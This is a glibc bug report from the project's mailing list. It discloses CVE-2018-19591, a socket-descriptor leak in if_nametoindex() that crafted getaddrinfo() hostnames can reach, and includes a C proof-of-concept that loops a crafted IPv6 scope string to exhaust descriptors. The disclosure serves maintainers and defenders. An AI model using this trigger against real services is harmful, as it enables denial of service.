This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.



[Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)


https://sourceware.org/bugzilla/show_bug.cgi?id=23927

            Bug ID: 23927
           Summary: Linux if_nametoindex() does not close descriptor
                    (CVE-2018-19591)
           Product: glibc
           Version: 2.28
            Status: UNCONFIRMED
          Severity: normal
          Priority: P2
         Component: network
          Assignee: unassigned at sourceware dot org
          Reporter: guidovranken at gmail dot com
  Target Milestone: ---

In sysdeps/unix/sysv/linux/if_index.c, __if_nametoindex() creates a socket
descriptor but does not close it if the 'ifname' parameter is too long. This is
a resource leak (CWE-404).

Additionally, it is possible to call getaddrinfo() with a crafted 'node'
parameter that leads to the offending code in __if_nametoindex().

In short, untrusted hostname resolutions (via getaddrinfo()) lead to descriptor
exhaustion.

MITRE has assigned CVE-2018-19591 for this issue.

Attribution: Guido Vranken

A proof-of-concept follows:

#include <errno.h>
#include <net/if.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Count open descriptors by probing every possible fd with fstat().
   errno is reset before each call: a failed fstat() with EBADF means the
   descriptor is closed, anything else means it is open. */
static int detect_open_descriptors(void)
{
    int fd_count = 0;
    int max_fd_number = getdtablesize();
    struct stat stats;
    for (int i = 0; i < max_fd_number; i++) {
        errno = 0;
        if (fstat(i, &stats) == 0 || errno != EBADF) { fd_count++; }
    }
    return fd_count;
}

int main(void)
{
    struct addrinfo hints, *res;

    memset(&hints, 0, sizeof(hints));
    hints.ai_socktype = SOCK_STREAM;

    printf("Open file descriptors before call to getaddrinfo: %d\n",
           detect_open_descriptors());
    /* The IPv6 scope id after '%' is longer than IFNAMSIZ, so getaddrinfo()
       reaches the overlong-name path in __if_nametoindex(); on an affected
       glibc each iteration leaves one socket descriptor open. The return
       value is deliberately ignored; only the descriptor count matters. */
    for (int i = 0; i < 1500; i++) {
        getaddrinfo("FEA0::%AAAAAAAAAAAAAAAA", NULL, &hints, &res);
        printf("Open file descriptors after call to getaddrinfo: %d\n",
               detect_open_descriptors());
    }

    return 0;
}

